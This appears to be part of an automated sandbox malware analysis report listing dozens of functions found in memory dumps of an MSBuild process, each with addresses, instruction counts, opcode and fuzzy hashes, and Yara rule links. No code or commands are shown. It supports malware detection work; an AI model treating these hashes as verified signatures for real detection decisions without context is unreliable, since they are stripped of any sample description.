Opcode ID: a182e1b5b97e8784dd2731bdab43ec8ca809586ed5b2017bbb0ceb5a5973397b
Instruction ID: 241f160a27bbb1f30c89a4818e01e879791270106c76d723137258d8086ffc7b
Opcode Fuzzy Hash: a182e1b5b97e8784dd2731bdab43ec8ca809586ed5b2017bbb0ceb5a5973397b
Instruction Fuzzy Hash: C1119D32E1065A9BCF00DFE8C8805CEBBB2FF89310F514616E910BB240E7B02686CB90

Uniqueness

Uniqueness Score: -1.00%

Function 05227708, Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.450206172.0000000005220000.00000040.00000001.sdmp, Offset: 05220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5220000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64cafcbf925a67455873bd69de2aaac583e1d411d0b931f09301b8b50c19abbb
Instruction ID: 9b766ffdd52bfcb4b843517132c1b50085dd2e36c666f9e17f75602a71e01c73
Opcode Fuzzy Hash: 64cafcbf925a67455873bd69de2aaac583e1d411d0b931f09301b8b50c19abbb
Instruction Fuzzy Hash: 31116D78B102598FDF10CFA9C4906AEBBF6FF89300F108429E409E7355DB34E9058B91

Uniqueness

Uniqueness Score: -1.00%

Function 052230D9, Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.450206172.0000000005220000.00000040.00000001.sdmp, Offset: 05220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5220000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eaf30ec84b3e78fe1f4b1b02586fe611d0d5b85824f73620a4b750d91483ff91
Instruction ID: e5e13fbc6513b6d584828a5e7ad1962305c931e2b5d40894029b9b1d7fced339
Opcode Fuzzy Hash: eaf30ec84b3e78fe1f4b1b02586fe611d0d5b85824f73620a4b750d91483ff91
Instruction Fuzzy Hash: BC11E032D0060A9BCF00DFE5D9406DDBBB6EFD5310F298622E501BB250DBB0268ACBD1

Uniqueness

Uniqueness Score: -1.00%

Function 052293E9, Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.450206172.0000000005220000.00000040.00000001.sdmp, Offset: 05220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5220000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c42444f92b10205f05de4e884116d62c64e9f552aa4a0f2166c789c0da1cb2b
Instruction ID: 190d364268b521f8db70238a53bd55ebac851966253325db7ffed538f08ca16c
Opcode Fuzzy Hash: 6c42444f92b10205f05de4e884116d62c64e9f552aa4a0f2166c789c0da1cb2b
Instruction Fuzzy Hash: 6D01B57631512467D7109A5AE490ABEBB8AEFC9275F44C43AF609CB281CF6198468760

Uniqueness

Uniqueness Score: -1.00%

Function 05221E00, Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.450206172.0000000005220000.00000040.00000001.sdmp, Offset: 05220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5220000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07ac571e938a4716236814df0630714616a52de0ec29d01ab7ed19729bdea0b7
Instruction ID: a78f9f7df9d82148a67babe6f70bf42c4affd2ee2b68f4feb40b594f323984e2
Opcode Fuzzy Hash: 07ac571e938a4716236814df0630714616a52de0ec29d01ab7ed19729bdea0b7
Instruction Fuzzy Hash: 8E112335A00704AFD712EB34D8459AABBB6FFCA314F048569E44193651CB31A95AD7E0

Uniqueness

Uniqueness Score: -1.00%

Function 009AD553, Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.442016224.00000000009AD000.00000040.00000001.sdmp, Offset: 009AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9ad000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f489b99e6b576ffe606c5cd095298b97b967ebccb3a62440d5e1ed565b150d11
Instruction ID: 9edef52ae215ce5da88918570b1362806fc18a9a74ec0b69c68d565b5c030c31
Opcode Fuzzy Hash: f489b99e6b576ffe606c5cd095298b97b967ebccb3a62440d5e1ed565b150d11
Instruction Fuzzy Hash: 7321AF76404280DFCB16CF10D9C4B16BF71FB85324F24C2AADC094BA5AC33AD866CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 05228958, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.450206172.0000000005220000.00000040.00000001.sdmp, Offset: 05220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5220000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0c3210138cc4f20d81f759a0bea260d68752a93153b96dbad153eb53a0ed7c2
Instruction ID: f8249b9326845c0907081dd31327eee14312c7f8cae96450693ecd22f479af5a
Opcode Fuzzy Hash: a0c3210138cc4f20d81f759a0bea260d68752a93153b96dbad153eb53a0ed7c2
Instruction Fuzzy Hash: FA119E35B102198FCB149F69D88896EBBFAEFCC210B104069E509C7375CB70DC428B91

Uniqueness

Uniqueness Score: -1.00%

Function 05229D8B, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.450206172.0000000005220000.00000040.00000001.sdmp, Offset: 05220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5220000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7f85905c3452072e9efc1d93755d0f3b005f6398f752d61b3cb7f5dc5d3f0dc
Instruction ID: ce730cf6ee5dbfe067ea052c7118978a5836490ad6335ee5bce5aed867769148
Opcode Fuzzy Hash: f7f85905c3452072e9efc1d93755d0f3b005f6398f752d61b3cb7f5dc5d3f0dc
Instruction Fuzzy Hash: BA116D72D2071AABCF15CFA0C84059EBB72FF89310F14852AF915BB250DBB19996CB90

Uniqueness

Uniqueness Score: -1.00%

Function 009AD81B, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.442016224.00000000009AD000.00000040.00000001.sdmp, Offset: 009AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9ad000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 537ea950bed0424b4f5998b86eb2e5b8c30d48e97970bff8397c73fcad38beb9
Instruction ID: 7fbb54572221b198c1b8b26dccb4904d0581f94c5865ee2d10521cbdef47bb4a
Opcode Fuzzy Hash: 537ea950bed0424b4f5998b86eb2e5b8c30d48e97970bff8397c73fcad38beb9
Instruction Fuzzy Hash: 1911D376905280CFCB16CF18D5C4B16BF71FB89320F24C6A9D8450BA56C33AD85ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 05224C37, Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.450206172.0000000005220000.00000040.00000001.sdmp, Offset: 05220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5220000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b48e56eb35d69449e12ddcbfcc634b0662b620fdcb498578f530ecd31ae63f13
Instruction ID: fe99b94015a6c7de5b9cc8eba143678383fef6a98cd986c4c7a8cf274f9887d3
Opcode Fuzzy Hash: b48e56eb35d69449e12ddcbfcc634b0662b620fdcb498578f530ecd31ae63f13
Instruction Fuzzy Hash: 7521B478A10225DFCB54DF14C584A99BBF1BF49319F518498E40DAB362C771E985CF90

Uniqueness

Uniqueness Score: -1.00%

Function 05224660, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.450206172.0000000005220000.00000040.00000001.sdmp, Offset: 05220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5220000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6846db15e79b16dd1c02c0f3158deb73d939030ace15e02bc81d9cb2799739d
Instruction ID: d12a3cb8df1e83dc33f110a16b971097bc96b29efd41a735e304ba2031cc7df9
Opcode Fuzzy Hash: f6846db15e79b16dd1c02c0f3158deb73d939030ace15e02bc81d9cb2799739d
Instruction Fuzzy Hash: AE113A32E1061A9BCB00DFE9C8805DEBBB6EF99314F114615E914BB240E7B0268ACB91

Uniqueness

Uniqueness Score: -1.00%

Function 05221850, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.450206172.0000000005220000.00000040.00000001.sdmp, Offset: 05220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5220000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11311a95ad4feb47bbba71a6fffebd2f7432dfa7b5fba1b914f3d3288a85b5f2
Instruction ID: 9493575174005831d6508e37e546bdb5f032e2d62d791625129b6e152deaf648
Opcode Fuzzy Hash: 11311a95ad4feb47bbba71a6fffebd2f7432dfa7b5fba1b914f3d3288a85b5f2
Instruction Fuzzy Hash: 1B1186342046449FC715CF29C940C6ABBF5EF89224304C99AE8998B762C731EC46CB60

Uniqueness

Uniqueness Score: -1.00%

Function 05221E10, Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.450206172.0000000005220000.00000040.00000001.sdmp, Offset: 05220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5220000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc31fcd49338fc187ad86625000f76b92b654fd85f08db19d0a9a0a6056f45ac
Instruction ID: 7dd258ba517a85dc33f1e588634578df0d46318fefd4ef56a7f437211d984f6b
Opcode Fuzzy Hash: bc31fcd49338fc187ad86625000f76b92b654fd85f08db19d0a9a0a6056f45ac
Instruction Fuzzy Hash: 6511E139A00619EFCB21EB24D8459AABBB7FFC9315F044528E80253254DB35AD96CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 052230E8, Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.450206172.0000000005220000.00000040.00000001.sdmp, Offset: 05220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5220000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e052fb1ea4acf02d7da6d0817a1ab0816c6d12c6952f282aac1088f3f8c1136a
Instruction ID: 8d60cef6b2443d70cb30744020115a0ab24b452e6a597d32730096e89fe00f53
Opcode Fuzzy Hash: e052fb1ea4acf02d7da6d0817a1ab0816c6d12c6952f282aac1088f3f8c1136a
Instruction Fuzzy Hash: 9B116D32D0060E9BCF00DFE5C9405DEFBB6EF99310F254625E6017B250EBB02A8ACB95

Uniqueness

Uniqueness Score: -1.00%

Function 05221F0F, Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.450206172.0000000005220000.00000040.00000001.sdmp, Offset: 05220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5220000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a71bb2aa80bd4bde72937cd44bab91432b25d0494e1acc5f6f1e8e4a6f25fee
Instruction ID: 21e96ec7810b22c67820e0c2fc48e2a2fe82f51de65416300eba0e92ec4e33b9
Opcode Fuzzy Hash: 8a71bb2aa80bd4bde72937cd44bab91432b25d0494e1acc5f6f1e8e4a6f25fee
Instruction Fuzzy Hash: 3C11A130204B4A9FC350DF29C540986B7FAFF81219B04CE99E0958BA61D770F95ACBD4

Uniqueness

Uniqueness Score: -1.00%

Function 009AD921, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.442016224.00000000009AD000.00000040.00000001.sdmp, Offset: 009AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9ad000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06e526ef05314aebe5511091be8e0c73dbc5cd8611b728c643b32f49d88ea926
Instruction ID: 52f16fbebe8529b24e314823d298a0b9e06c894883ac5ba1ebdfb6c33ed95bca
Opcode Fuzzy Hash: 06e526ef05314aebe5511091be8e0c73dbc5cd8611b728c643b32f49d88ea926
Instruction Fuzzy Hash: 1D01F77100B340AAD7104B61CC807A7BB9CEF82374F18C859EC4A1F646D379D844C6F1

Uniqueness

Uniqueness Score: -1.00%

Function 05221EA8, Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.450206172.0000000005220000.00000040.00000001.sdmp, Offset: 05220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5220000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bca9136aa0cdcd3dc9a61243bd0970027d1fd6c7c6946c751573e15fb53f8d6c
Instruction ID: 0e5b12b33efaa53bec334ed79ca38d90aaa317a6c83be11db51b5fcb179dfa9d
Opcode Fuzzy Hash: bca9136aa0cdcd3dc9a61243bd0970027d1fd6c7c6946c751573e15fb53f8d6c
Instruction Fuzzy Hash: 75F0F4717042002FE700CA25D840A6BFBF9EFC9228F10862AF558C7241CB21EC02C390

Uniqueness

Uniqueness Score: -1.00%

Function 05221260, Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.450206172.0000000005220000.00000040.00000001.sdmp, Offset: 05220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5220000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51ea90ac8e2116bc0703e8743cddfe8581ab647fd5d618cd532a2e19855195f1
Instruction ID: 2033a68ea42de08453fc780f22ac4efc2dc46789724bf120cf09163b38f39bbd
Opcode Fuzzy Hash: 51ea90ac8e2116bc0703e8743cddfe8581ab647fd5d618cd532a2e19855195f1
Instruction Fuzzy Hash: C4F04632B141619FC318CB20EA15F46BB61FB81319F4581A5E008CB292C734E883CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 05223179, Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.450206172.0000000005220000.00000040.00000001.sdmp, Offset: 05220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5220000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c06d7e62dfeaaf4d7bd9cded34ec8e9265503c2c9dd21619d8f84622939bb3fb
Instruction ID: b59f8df2ae3ada217a6dc399c34b1e1a9ea7b878f9e4efd32a0cc7a32605b543
Opcode Fuzzy Hash: c06d7e62dfeaaf4d7bd9cded34ec8e9265503c2c9dd21619d8f84622939bb3fb
Instruction Fuzzy Hash: 99F02B32E14108ABDB04DA61C9655DFBFBA9F95340F458826A512F7340DFB16906D7C1

Uniqueness

Uniqueness Score: -1.00%

Function 05221F20, Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.450206172.0000000005220000.00000040.00000001.sdmp, Offset: 05220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5220000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d227aa1a5d30c6baec6c9b0dff3c444bb793094537d4ce4761806f82ddec0b10
Instruction ID: 38ac38942b3d3b91b184c9a031acfaf8b92860bd6b3ea6c0989bf94c2dc5601c
Opcode Fuzzy Hash: d227aa1a5d30c6baec6c9b0dff3c444bb793094537d4ce4761806f82ddec0b10
Instruction Fuzzy Hash: 4D012130204B4A9FC7A0DF69C580D86B7FABF85219B04CE59E0958BA60D770F95ACBD4

Uniqueness

Uniqueness Score: -1.00%

Function 05221EB8, Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.450206172.0000000005220000.00000040.00000001.sdmp, Offset: 05220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5220000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 344bbafcfa7490d48acf01ecee98915f1c80980cd253f9d288cc6b3ccbf287b4
Instruction ID: 788c6d93ab532c88cf59d78efdaa109125b1451a612f24fac00d7b69c3e26f8c
Opcode Fuzzy Hash: 344bbafcfa7490d48acf01ecee98915f1c80980cd253f9d288cc6b3ccbf287b4
Instruction Fuzzy Hash: 6AF090717043542F93108A6AD84096BFBEAEFC9269710462AF559C3241DB21FC46C7A4

Uniqueness

Uniqueness Score: -1.00%

Function 009AD920, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.442016224.00000000009AD000.00000040.00000001.sdmp, Offset: 009AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9ad000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ade6b3ae08961cf99daf8ca112590ee7afb13ad0a373832da07bc8e2152824f
Instruction ID: a684b4bfffb5ae6a1b3a3fc6d50c575ef8172c8202e4956fb9a18bedf3547f38
Opcode Fuzzy Hash: 4ade6b3ae08961cf99daf8ca112590ee7afb13ad0a373832da07bc8e2152824f
Instruction Fuzzy Hash: 1CF0CD71406284AEEB108E15CCC4B63FF9CEB92734F18C45AED485F686C379AC44CAB1

Uniqueness

Uniqueness Score: -1.00%

Function 05224704, Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.450206172.0000000005220000.00000040.00000001.sdmp, Offset: 05220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5220000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a31fff47510e3135d7e40ddbec6a42beae2a2af5152ec96e8a40899b9c9bad6d
Instruction ID: bd1519d8811a2cc607fb642b802bd84a92797846d4d43e41cb93974ac9ecbde5
Opcode Fuzzy Hash: a31fff47510e3135d7e40ddbec6a42beae2a2af5152ec96e8a40899b9c9bad6d
Instruction Fuzzy Hash: C8F02436E141089BCF05DB60CA696EEBBB65F44300F05882AD512BB380DF705A45CBC1

Uniqueness

Uniqueness Score: -1.00%

Function 05222D71, Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.450206172.0000000005220000.00000040.00000001.sdmp, Offset: 05220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5220000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d9c00748976994953380645cbadf6fe454971d690d4930a7e2bf870e5e4ef86
Instruction ID: 90cbeb69764c8234071dad28d6e1a9fbb01a0ec257f3103c6355ca2e82959c95
Opcode Fuzzy Hash: 8d9c00748976994953380645cbadf6fe454971d690d4930a7e2bf870e5e4ef86
Instruction Fuzzy Hash: D5F0243AE24118DBDF05CB60CA666EF7BB65F44210F058A26A112FB3C0DF705645C7C1

Uniqueness

Uniqueness Score: -1.00%

Function 052228E0, Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.450206172.0000000005220000.00000040.00000001.sdmp, Offset: 05220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5220000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4999be02a350635003aaca7c8aa30bdb9697e7f14ae62314dd8157b6bce340ce
Instruction ID: 914a834dfc8fb90b9b48ff3657b6ca3bb9c7221206fbaaf83975a34cf167e04c
Opcode Fuzzy Hash: 4999be02a350635003aaca7c8aa30bdb9697e7f14ae62314dd8157b6bce340ce
Instruction Fuzzy Hash: 1DF0243AE14108DBCF05CBB0C5A56EE7FBA5F44214F15892AD502BB390EF715A0AC7C1

Uniqueness

Uniqueness Score: -1.00%

Function 052217F8, Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.450206172.0000000005220000.00000040.00000001.sdmp, Offset: 05220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5220000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ef5b8dc89b2c4cbc93a2176af2d5009cd1615406671c5507382e29bce021ed9
Instruction ID: 06876d5146923753c9cc1cf768fbf3130223051a95412b4d7cacd8c50f5e228b
Opcode Fuzzy Hash: 2ef5b8dc89b2c4cbc93a2176af2d5009cd1615406671c5507382e29bce021ed9
Instruction Fuzzy Hash: E2F0A7763001146BF7045666ECA5F667BAEFBD9271F088429FD44C7380D925D906A2A0

Uniqueness

Uniqueness Score: -1.00%

Function 052214B7, Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.450206172.0000000005220000.00000040.00000001.sdmp, Offset: 05220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5220000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ae5c4e5909608d0066c2a521bd2d993b6b4089e3c4ffe05a5b0f33ba83899b0
Instruction ID: d4316005fd34f5f2cac35633f8993040e5312a76c0a430411d48ac618bf92883
Opcode Fuzzy Hash: 6ae5c4e5909608d0066c2a521bd2d993b6b4089e3c4ffe05a5b0f33ba83899b0
Instruction Fuzzy Hash: 90F0C731B200249FDB049BE8D810BADB7F6FBC4324F40802AE605AB284CBB18816DB80

Uniqueness

Uniqueness Score: -1.00%

Function 05221D32, Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.450206172.0000000005220000.00000040.00000001.sdmp, Offset: 05220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5220000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33d53e147aea23386488a24765a9500b7566fcf94f3b66ba35bcc1fc49d96c81
Instruction ID: 797240a4ed658ec1bdcfe1d3bdfc64478c8e9131f5d2e1e4130c25a493e52b19
Opcode Fuzzy Hash: 33d53e147aea23386488a24765a9500b7566fcf94f3b66ba35bcc1fc49d96c81
Instruction Fuzzy Hash: 0AF037B4E0420AAFCB44DFA8C5819AEFFB1EF48200F10816AD819A7351D331AA12CB90

Uniqueness

Uniqueness Score: -1.00%

Function 05220FBC, Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.450206172.0000000005220000.00000040.00000001.sdmp, Offset: 05220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5220000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13ec4227920b8c2e24579fca7927d44b33a91c6ffd29781c0c3224dbce11b2cb
Instruction ID: 2138e4ce26dd6d7d37484874655d8934c28405b2e2523079d0120d880252e7e7
Opcode Fuzzy Hash: 13ec4227920b8c2e24579fca7927d44b33a91c6ffd29781c0c3224dbce11b2cb
Instruction Fuzzy Hash: 0B011678924269EFDB60CF04C548B9EBBB1BF05314F508099E449AB2A1CBB58A84DF42

Uniqueness

Uniqueness Score: -1.00%

Function 052228F0, Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.450206172.0000000005220000.00000040.00000001.sdmp, Offset: 05220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5220000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af853dadbdbcd2869317a00fa1b0f63dfa8c979ab6766da72dd29abe6568c0be
Instruction ID: e5dbc5ab84f6bd6866df037e53aaf771c07a2efa8490f9cfb63e3b81347dbbc0
Opcode Fuzzy Hash: af853dadbdbcd2869317a00fa1b0f63dfa8c979ab6766da72dd29abe6568c0be
Instruction Fuzzy Hash: 0CF0E236E14108ABCF14DB60C4649EFBBFA9F84310F11882AD102BB340DFB16A06C6C1

Uniqueness

Uniqueness Score: -1.00%

Function 05225158, Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.450206172.0000000005220000.00000040.00000001.sdmp, Offset: 05220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5220000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ca84b16dff56622162a39aa19fc5fc47f897bab7892aed8e009eef64a9af748
Instruction ID: e624a051b5d917d94d3b8104e33a0f95c82e35ed60e0a4d6ea4d19750472b594
Opcode Fuzzy Hash: 6ca84b16dff56622162a39aa19fc5fc47f897bab7892aed8e009eef64a9af748
Instruction Fuzzy Hash: 95F02772619318AFE7248626EC45A57BFAAEBC5335F00C13EE00C87191DB706845C7A8

Uniqueness

Uniqueness Score: -1.00%

Function 05220FCD, Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.450206172.0000000005220000.00000040.00000001.sdmp, Offset: 05220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5220000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca706f44c4553af821400491ab213079b726582aace12db1e95d50d2fb32b89d
Instruction ID: 12b39d49de30670874c0bbb77a5c523b27bc8b807e61069463c32f1a7e38729e
Opcode Fuzzy Hash: ca706f44c4553af821400491ab213079b726582aace12db1e95d50d2fb32b89d
Instruction Fuzzy Hash: 5301F678A24269DFC7648F14C848B99BBB1BF09310F558499E8899B261CB708A80DF41

Uniqueness

Uniqueness Score: -1.00%

Function 05221808, Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.450206172.0000000005220000.00000040.00000001.sdmp, Offset: 05220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5220000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ce4ed31370f7a0b03b8984696867c1d4eac0e9b70831414e29af6df0d5f42fe
Instruction ID: cb6b7fcd0f2b10e186f3ab8885c2c28119bbccf857d4a80cf188f5d4b98b6c61
Opcode Fuzzy Hash: 2ce4ed31370f7a0b03b8984696867c1d4eac0e9b70831414e29af6df0d5f42fe
Instruction Fuzzy Hash: 50E06D753001146BAA18266AAC85E3ABBDEEBC96B1B048425F90986280DA659D11E7A1

Uniqueness

Uniqueness Score: -1.00%

Function 05221D74, Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.450206172.0000000005220000.00000040.00000001.sdmp, Offset: 05220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5220000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e6264c669dc3f461c29d8b954e9a315d0153fad818ab53d2d17799b75034362
Instruction ID: 9ae1d92302a99c58976d6c99c3508c20a61fea1c67ad6b29f38ae029dd919e5f
Opcode Fuzzy Hash: 5e6264c669dc3f461c29d8b954e9a315d0153fad818ab53d2d17799b75034362
Instruction Fuzzy Hash: B7F03A35A102089FDF04EFB0DD51AFEB736AF88354F008568E901A72A4CF35A851DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 05221D40, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.450206172.0000000005220000.00000040.00000001.sdmp, Offset: 05220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5220000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fac97a62701224894876c370d8538cbb6890367dd87a119cd023d3290db38fd7
Instruction ID: f6541fc57cd29f781a5d0f778bc22c264621955f1fa6cc7bb41520a3874e0162
Opcode Fuzzy Hash: fac97a62701224894876c370d8538cbb6890367dd87a119cd023d3290db38fd7
Instruction Fuzzy Hash: 0CF067B8E0420AAF8B44DF99C5819AEBBF5AF48214F10856AD919A7350D731A952CF90

Uniqueness

Uniqueness Score: -1.00%

Function 05227808, Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.450206172.0000000005220000.00000040.00000001.sdmp, Offset: 05220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5220000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ad6df52a63ea62be51885381b608c3e7e4d8754ab8eb1c6939ba02ff965799d
Instruction ID: aa12de65d261871cc73de8f406008555ec0c58856499e0d359bd187d7e1b0d7a
Opcode Fuzzy Hash: 3ad6df52a63ea62be51885381b608c3e7e4d8754ab8eb1c6939ba02ff965799d
Instruction Fuzzy Hash: EED0C26BB2A22456CB2086B96D076D9BB59DF44461F08427AD90AE2602D6A08914C2E2

Uniqueness

Uniqueness Score: -1.00%

Function 05223FC8, Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.450206172.0000000005220000.00000040.00000001.sdmp, Offset: 05220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5220000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f7f5e15aed8c640b0e3d3750d7cfad01cdf1fff7dd3d34a4b6e823f2af31675
Instruction ID: 065e1b7355e09919f7eea77cea844cf2b21401f4826467d07caaba763bb9ef45
Opcode Fuzzy Hash: 2f7f5e15aed8c640b0e3d3750d7cfad01cdf1fff7dd3d34a4b6e823f2af31675
